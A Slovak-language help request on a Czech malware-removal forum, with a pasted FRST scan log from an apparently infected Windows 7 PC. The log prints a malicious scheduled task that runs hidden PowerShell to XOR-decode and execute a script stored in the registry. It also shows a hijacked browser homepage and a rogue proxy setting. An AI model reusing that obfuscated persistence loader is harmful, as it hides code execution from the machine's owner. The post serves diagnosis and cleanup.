Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Prihlasovanie do FB, otvaranie okien v browseri

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Odpovědět
Zpráva
Autor
mivefe5888
Návštěvník
Návštěvník
Příspěvky: 6
Registrován: 23 lis 2023 19:26

Prihlasovanie do FB, otvaranie okien v browseri

#1 Příspěvek od mivefe5888 »

Zdravim, mam taky problem ze mi FB uz 2 krat dal upozornenie o prihlaseni, s tym ze som hned zmenil heslo a aj tak to po pol hodine prislo znova, tak isto sa mi raz otvorilo v browseri nejake okno z reklamou, poprosil by som o kontrolu

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-11-2023 02
Ran by John (administrator) on JOHN-PC (23-11-2023 19:43:41)
Running from C:\Users\John\Downloads\FRST64.exe
Loaded Profiles: John
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(C:\Program Files (x86)\Opera\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\95.0.4635.90\opera_crashreporter.exe
(C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(C:\Program Files\Sublime Text 3\sublime_text.exe ->) (Sublime HQ Pty Ltd -> ) C:\Program Files\Sublime Text 3\plugin_host.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\John\AppData\Local\Discord\app-1.0.9024\Discord.exe <6>
(explorer.exe ->) () [File not signed] I:\stahovanie\gammy_v0.9.64\gammy.exe
(explorer.exe ->) (Figma, Inc. -> ) C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <47>
(explorer.exe ->) (Johannes Millan) [File not signed] [File is in use] I:\stahovanie\superProductivity-7.12.0.exe
(explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\calc.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(explorer.exe ->) (Sublime HQ Pty Ltd -> Sublime HQ Pty Ltd) C:\Program Files\Sublime Text 3\sublime_text.exe
(explorer.exe ->) (TeamSpeak Systems GmbH -> TeamSpeak Systems GmbH) C:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe
(explorer.exe ->) (Vincent Burel -> VB-AUDIO Software) C:\Program Files (x86)\VB\Voicemeeter\voicemeeterpro.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler64.exe
(I:\stahovanie\superProductivity-7.12.0.exe ->) (Johannes Millan) [File not signed] C:\Users\John\AppData\Local\Temp\2EDNJDl4YnJmwr5naxHqvVY7EUJ\superProductivity.exe <4>
(Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\opera.exe <54>
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
(services.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(services.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(services.exe ->) (SolidWorks) [File not signed] C:\Program Files (x86)\Common Files\SOLIDWORKS Shared\Service\SolidWorksLicensing.exe
(services.exe ->) (South River Technologies -> South River Technologies, Inc.) C:\Program Files\WebDrive\wdService.exe
(services.exe ->) (Synology Inc. -> ) C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Tonalio GmbH -> Sandboxie-Plus.com) D:\windows programy\Sandboxie-Plus\SbieSvc.exe
(services.exe ->) (Trace Software International -> ) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe
(services.exe ->) (VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [Figma Agent] => C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe [6795040 2023-10-31] (Figma, Inc. -> )
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe [70912472 2023-11-16] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Windows x64\Print Processors\Canon MG3000 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDG.DLL [30720 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Windows x64\Print Processors\Canon TS3300 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDG3.DLL [482816 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3000 series: C:\Windows\system32\CNMLMDG.DLL [485376 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3300 series: C:\Windows\system32\CNMLMG3.DLL [1311232 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\EPSON WF-2870 Series 64MonitorBE: C:\Windows\system32\E_YLMBXVE.DLL [187392 2018-06-15] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\HP 1853 Status Monitor: C:\Windows\system32\hpinksts1853LM.dll [467464 2019-11-28] (HP Inc -> HP Inc.)
HKLM\...\Print\Monitors\HP Discovery Port Monitor (HP DeskJet 2700 series): C:\Windows\system32\HPDiscoPM1853.dll [996512 2022-01-25] (HP Inc. -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\Installer\chrmstp.exe [2023-03-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{BC455173-F501-4356-804F-571FAFB6EA9A}] -> RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\Installer\chrmstp.exe [2020-11-24] (Avast Software s.r.o. -> AVAST Software)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {41D08211-8A07-4B1A-948A-B4B8BF58632A} - System32\Tasks\Robotka
Task: {AAAA1BA0-9973-47D1-B128-DD3F1CC9DEF6} - System32\Tasks\Motivacia
Task: {483F605F-4ACC-438C-A6BA-C7E06893DE4E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1552376 2022-09-26] (Adobe Inc. -> Adobe Inc.)
Task: {E064BC14-AB10-4997-B691-1589F21C0F1F} - System32\Tasks\AdobeAAMUpdater-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {A44084B5-2748-4011-95F6-DAF5403D9398} - System32\Tasks\AdobeGCInvoker-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {C826FD7A-B8B6-40D8-A041-2076C47165CA} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [4621920 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
Task: {B6215906-8048-45F1-AC2E-0D0F74C0649A} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {C2B756A2-8142-4B50-B9C0-C715DB45B991} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {0A9D12E3-3DCF-40E3-80B9-803013CD2C22} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (No File)
Task: {9D6C3930-F621-4296-A748-5865083AD527} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1741416 2020-09-22] (Avast Software s.r.o. -> Avast Software)
Task: {4D82607E-7526-4BF6-9F28-C3328EC91A74} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {6B681D84-73C0-42F0-816A-FAC346025961} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {E82B4641-76E0-465D-875B-7C8D9733E5FD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-06] (Piriform Ltd -> Piriform Ltd)
Task: {8B006428-2138-449F-8FEF-00FD52F474FC} - System32\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {89F2385D-C566-491E-8211-929329243711} - System32\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {6CA9BD1E-E93C-4F62-A79E-4BC1371F6109} - System32\Tasks\HPCustParticipation HP DeskJet 2700 series => C:\Program Files\HP\HP DeskJet 2700 series\Bin\HPCustPartic.exe [6732960 2022-01-25] (HP Inc. -> HP Inc.)
Task: {454DE0F3-8EFA-4669-8D0B-C409CA75EFF0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {9254C62C-104D-473C-BB40-833CC10AD75B} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {571EEDE0-9D34-4AC1-9B1F-AD573C6CAC52} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {5D6BF89C-14FD-4209-BEDE-8D6B54312C30} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
Task: {75A225D9-05D2-41D3-89C6-7C86CBC51CBE} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KE4x9F5p\4F379EE4-AF11-4D1B-8863-5E5A969FD790 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [473600 2009-07-14] (Microsoft Windows -> Microsoft Corporation) -> -WINdowstyLE hiDDEN -comMAnD "icm ([sCripTBlOCk]::creatE([sTRInG]::JoIN('', ((get-ITEmpRoPerty -PATh 'Hklm:\soFtware\GhiSlerkE4X9').'ke4X9F5' | % { [CHar]($_ -bXOr 128) }))))"
Task: {E296B281-E679-4FF5-9072-68B6B9295C53} - System32\Tasks\Microsoft\Windows\RestartManager\{369FD764-7CF1-4ad7-B1C9-2445F4CAF599} => C:\Windows\system32\rmclient.exe [16896 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {999F29AA-219C-4D8B-8489-FC171F033440} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [765888 2023-04-18] (Mozilla Corporation -> Mozilla Foundation)
Task: {47F65D7C-3405-49BE-9CB4-34FDE0AF233D} - System32\Tasks\Opera scheduled Autoupdate 1473525916 => C:\Program Files (x86)\Opera\launcher.exe [1977760 2023-10-30] (Opera Norway AS -> Opera Software)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{E68B163E-C7D5-4EDD-9994-7FE352488197} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{F36A92EA-C9F5-4280-9BE4-615524B64A59} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-949114339-2066100574-2594248327-1000] => 178.32.129.31:3128
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{54287F57-F62E-4A77-887F-98CFD53339ED}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B1477436-BDB7-43DB-8368-4FEBFCEBABA8}: [DhcpNameServer] 192.168.0.1

Edge:
=======
Edge Profile: C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default [2023-09-05]
Edge Extension: (Edge relevant text changes) - C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2023-09-05]

FireFox:
========
FF DefaultProfile: vtnva5hp.default
FF DefaultProfile: dpdx1dpi.default
FF DefaultProfile: 39pruj5d.default
FF DefaultProfile: 5fn2593k.default
FF ProfilePath: C:\Users\John\AppData\Roaming\Zotero\Zotero\Profiles\vtnva5hp.default [2023-04-16]
FF ProfilePath: C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default [2019-07-14]
FF NetworkProxy: old Mozilla\Firefox\Profiles\dpdx1dpi.default -> backup.ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\@flash_debugger.xpi [2019-07-14]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\sp@avast.com.xpi [2019-01-23]
FF Extension: (Avast Online Security) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\wrc@avast.com.xpi [2018-07-17]
FF Extension: (Video DownloadHelper) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2018-07-22]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default [2019-07-14]
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default\Extensions\@flash_debugger.xpi [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\39pruj5d.default [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\ly01ikd2.default-release [2023-07-30]
FF NetworkProxy: Mozilla\Firefox\Profiles\ly01ikd2.default-release -> backup.ftp", "89.221.223.204"
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\5fn2593k.default [2021-06-06]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default [2021-06-09]
FF NetworkProxy: Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default -> ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default\Extensions\@flash_debugger [2017-04-12] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2023-03-08] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin: @java.com/DTPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\dtplugin\npDeployJava1.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\plugin2\npjp2.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
StartMenuInternet: Firefox-CA9422711AE1A81C - C:\Program Files\Firefox Developer Edition\firefox.exe

Chrome:
=======
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default [2023-11-23]
CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3321897&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SPDDB91BBD-BA11-4584-980A-F18600097BBE&SSPV=
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3321897&octid ... oogle.com/"
CHR Extension: (Ban Checker for Steam) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\canbadmphamemnmdfngmcabnjmjgaiki [2023-10-12]
CHR Extension: (CSS Used) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cdopjfddjlonogibjahpnmjpoangjfff [2023-04-17]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2023-11-12]
CHR Extension: (Steam Inventory Helper) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2023-11-22]
CHR Extension: (Avast Online Security & Privacy (BETA)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2023-01-19]
CHR Extension: (BuiltWith Technology Profiler) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dapjbgnjinbpoindlpdmhochffioedbn [2022-05-12]
CHR Extension: (Slither.io Skins, Mods, Hack & Guide) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dggomkijbihggjgcgdbnleolpleddaid [2016-06-12]
CHR Extension: (Session Buddy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2023-11-12]
CHR Extension: (Zotero Connector) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2023-10-02]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2023-04-30]
CHR Extension: (DarkOrbit SID Login) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgkcmijdllamjcbfeeheebbphpnbmbco [2019-07-01]
CHR Extension: (Video Downloader PLUS) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhplmmllnpjjlncfjpbbpjadoeijkogc [2020-09-29]
CHR Extension: (Word Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiombgjlkfpdpkbhfioofeeinbehmajg [2021-05-13]
CHR Extension: (Bad Connection Simulator) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gflankmgolakfdeiponkgmbhbhpdmjlg [2023-10-17]
CHR Extension: (Google Docs Offline) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2023-06-01]
CHR Extension: (Avast Online Security & Privacy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2023-01-17]
CHR Extension: (Multi Session Box - Multi login any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\hojmmbfmaddjdkkcgbiipkphdcfmkhge [2021-09-04]
CHR Extension: (Stream Video Downloader) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-14]
CHR Extension: (Unseen for Facebook) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jiomcgpfgkeefipihnplhadgdoollmap [2021-01-08]
CHR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2023-07-30]
CHR Extension: (Chromebook Recovery Utility) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jndclpdbaamdhonoechobihbbiimdgai [2022-06-02]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-01-26]
CHR Extension: (WebChatGPT: ChatGPT with internet access) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfemeioodjbpieminkklglpmhlngfcn [2023-11-23]
CHR Extension: (PowerPoint Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-03-24]
CHR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-19]
